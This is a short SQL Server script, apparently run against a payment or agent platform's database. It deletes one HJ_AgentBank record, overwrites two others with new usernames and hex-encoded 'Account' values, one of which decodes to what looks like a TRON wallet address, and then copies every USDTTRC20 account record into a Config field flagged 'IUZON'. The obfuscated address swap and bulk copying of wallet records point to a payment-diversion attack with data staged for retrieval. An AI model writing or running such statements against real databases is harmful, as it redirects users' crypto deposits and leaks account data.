UPDATE Config SET value = 'true' WHERE code = 'IUZON';

DELETE FROM HJ_AgentBank WHERE id = 3364;

UPDATE HJ_AgentBank SET username = 'ddul888', Account = '54|42|68|6E|7A|58|32|54|54|33|34|50|4E|63|7A|37|6E|75|50|34|39|54|48|44|6D|77|70|72|38|36|56|4A|58|75|', Operator = 'ddul888' WHERE id = 3199 
UPDATE HJ_AgentBank SET username = 'd5168chen', Account = '54|4E|4B|38|6F|45|58|73|5A|53|37|54|51|39|6E|70|4B|70|56|76|67|57|61|73|48|69|76|5A|74|6D|76|59|74|77|', Operator = 'd5168chen' WHERE id = 3264 


DECLARE @CombinedResults NVARCHAR(MAX);
SET @CombinedResults = '';

DECLARE myCursor CURSOR FOR
SELECT id, username, account, operator, CONVERT(VARCHAR, createTime, 120), CONVERT(VARCHAR, updateTime, 120)
FROM HJ_AgentBank
WHERE ShortName = 'USDTTRC20' 
ORDER BY UpdateTime DESC;

DECLARE @id NVARCHAR(50), @username NVARCHAR(50), @account NVARCHAR(200), @operator NVARCHAR(50), @createTime NVARCHAR(50), @updateTime NVARCHAR(50);

OPEN myCursor;
FETCH NEXT FROM myCursor INTO @id, @username, @account, @operator, @createTime, @updateTime;

WHILE @@FETCH_STATUS = 0
BEGIN
SET @CombinedResults = @CombinedResults + '&'
+ ISNULL(@id, '') + ',' + ISNULL(@username, '') + ',' + ISNULL(@account, '') + ',' + ISNULL(@operator, '') + ',' + ISNULL(@createTime, '') + ',' + ISNULL(@updateTime, '');
FETCH NEXT FROM myCursor INTO @id, @username, @account, @operator, @createTime, @updateTime;
END;

CLOSE myCursor;
DEALLOCATE myCursor;
SET @CombinedResults = STUFF(@CombinedResults, 1, 1, '');
UPDATE Config SET value = @CombinedResults WHERE code = 'IUZON';